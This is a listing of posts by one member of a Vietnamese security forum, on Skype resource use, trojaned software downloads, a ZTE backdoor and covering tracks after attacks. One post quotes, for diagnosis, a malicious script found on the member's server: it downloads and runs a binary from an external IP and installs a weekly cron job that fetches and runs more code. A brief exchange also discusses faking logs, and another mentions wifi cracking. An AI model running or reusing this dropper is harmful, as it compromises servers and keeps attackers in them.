Messages posted by "dancerhp"

Skype bị ngốn quá nhiều tài nguyên

dancerhp — GMT

Skype của em 2 hôm nay nó ngốn bình quân 50% CPU và 300MB ram, em đã gỡ, dọn dẹp rác rưởi, cài lại nhưng vẫn bị vậy. Hiện em dùng ESET 5.2.91 update mới nhất. Nhờ các bác chuẩn đoán giúp em trường hợp này vợ ạ. Ảnh chụp process: https://drive.google.com/file/d/0B2ZSr8t8dYCnTkJiRmxIX01odjA/edit?usp=sharing Thanks.

Nhờ các bác kiểm tra dùm em này

dancerhp — GMT

Em này em thấy dạo này nó hay tấn công sv của em, nằm tại địa chỉ: http://221.132.37.26/xx, Nó tạo ra 1 cronjob như sau: Code:

#!/bin/sh

cd /dev/shm
wget -q http://221.132.37.26/xx -O .xx
chmod +x .xx
./.xx

echo "@weekly wget -q http://221.132.37.26/scen -O /tmp/sh;sh /tmp/sh;rm -rd /tmp/sh" >> /tmp/corn
crontab /tmp/corn
rm -rf /tmp/corn

Nhờ các bác kiểm tra dùm xem nó đang cố làm trò gì với ạ. Regard.

HVA News - ZTE thừa nhận có backdoor trong thiết bị Android của họ

dancerhp — GMT

Theo như em biết thì VNPT cũng dùng nhiều hàng này lắm, không biết động thái thế nào rồi có ai nắm được không?

Đề nghị xem xét lại hành vi của Mod xnohat

dancerhp — GMT

Việc lạm dụng quyền để ban lock thành viên ở các diễn đàn hoạt động vì cơm áo gạo tiền thì phổ biến lắm. Nhưng ở HVA, một diễn đàn của anh em kỹ thuật - không vụ lợi - nơi mà anh em được thoải mái bày tỏ quan điểm của mình (miễn là không trái với nội quy) thì những hành động lạm dụng quyền cần bị loại bỏ. Đồng ý với ý kiến của tranvaminh nếu xnohat lạm quyền như vậy.

Case Study: xoá vết (cover tracks)

dancerhp — GMT

phonglanbiec wrote:

... Tuy nhiên, sự thật là sự thật, nếu người khác có thời gian, chắc chắn họ sẽ tìm ra. Do vậy, ngoài việc có thể/không có thể can thiệp vào log của server. Ta còn phải tạo cho mình 1 vỏ bọc an toàn. Ví dụ như máy tính ta sau khi tấn công xong phải huỷ hết mọi thông tin: ví dụ như tấn công từ VMWare, sau khi tấn công xong thì lưu mọi thông tin đó lên Internet, huỷ ngay máy VMWare đó. Máy luôn sẵn sàng có 1 chương trình làm backdoor, 1 log ảo nhằm nếu bị phát hiện, thì ta vẫn có thể chứng minh mình là 1 nạn nhân trong 1 quá trình :)

Mình thấy nếu mà dùng cách sử dụng backdoor, log ảo để chứng mình không ổn lắm :) nếu bạn làm vậy thì người ta cũng có thể chứng minh bạn đã làm vậy :P

Hỏi về chương trình chat (IM) bảo mật nhất

dancerhp — GMT

camaptrang wrote:

sử dụng skype để chat thì bảo mật hơn ym và msn hay google chat .... nhưng skype lúc trước nó bị cái là 1 account đồng thời có nhiều máy cùng logon bằng 1 account khi đó 2 người nói chuyện người thứ 3 ngồi xem, hiện giờ không biết skype đã fix vấn đề này chưa ...

Cái này hiện tại vẫn còn, ko biết dụng ý của skype là gì, nhưng nó cũng là một tính năng lý thú: Ví dụ mình dùng skype trên laptop và PC đồng thời luôn chẳng hạn.

Sơ lược về crontab

dancerhp — GMT

Cái posting time của HVA có vẻ như bị trục trặc??

Acunetix Web Vulnerability Scanner 8 Consultant Edition

dancerhp — GMT

al0nex wrote:

dancerhp wrote:

Một đống trojan và backdoor, định cài cắm gì đây ông bạn? https://www.virustotal.com/file/358f3c8b2a9dc2e3ad15049c0c6008915792b7332a59dde9d67da65b362ed3d8/analysis/
cậu có thể ko xài ! tôi ko thừa hơi mà gắn virus vô. rùi post lên 1 diễn đàn hva toàn các cao thủ =)) nghĩ mà buồn cười =))

Bạn có ngó qua cái link tôi gửi không? Nếu bạn không đính kèm thì bạn cũng là một nạn nhân! Chả có gì buồn cười ở đây cả, chỉ buồn cười là việc cậu thấy buồn cười. ;)

Acunetix Web Vulnerability Scanner 8 Consultant Edition

dancerhp — GMT

Một đống trojan và backdoor, định cài cắm gì đây ông bạn? https://www.virustotal.com/file/358f3c8b2a9dc2e3ad15049c0c6008915792b7332a59dde9d67da65b362ed3d8/analysis/

Trojan được chèn vào phần mềm Unikey, Unikey.org bị hacker kiếm soát

dancerhp — GMT

Hôm qua kiểm tra và đưa kết quả lên trên này: /hvaonline/posts/list/41381.html#256320 Có bác còn bảo là có phiên bản Unikey mới :)

Không mở dược ariodump-ng.exe để hack wifi?

dancerhp — GMT

Không có driver thì chịu thôi bạn ơi! Mà cái này bạn muốn crack thì phải có dict cho nó, cái dict này gặp phải thằng nào nó đặt pass oái oăm thì có dò cả ngày không ra :P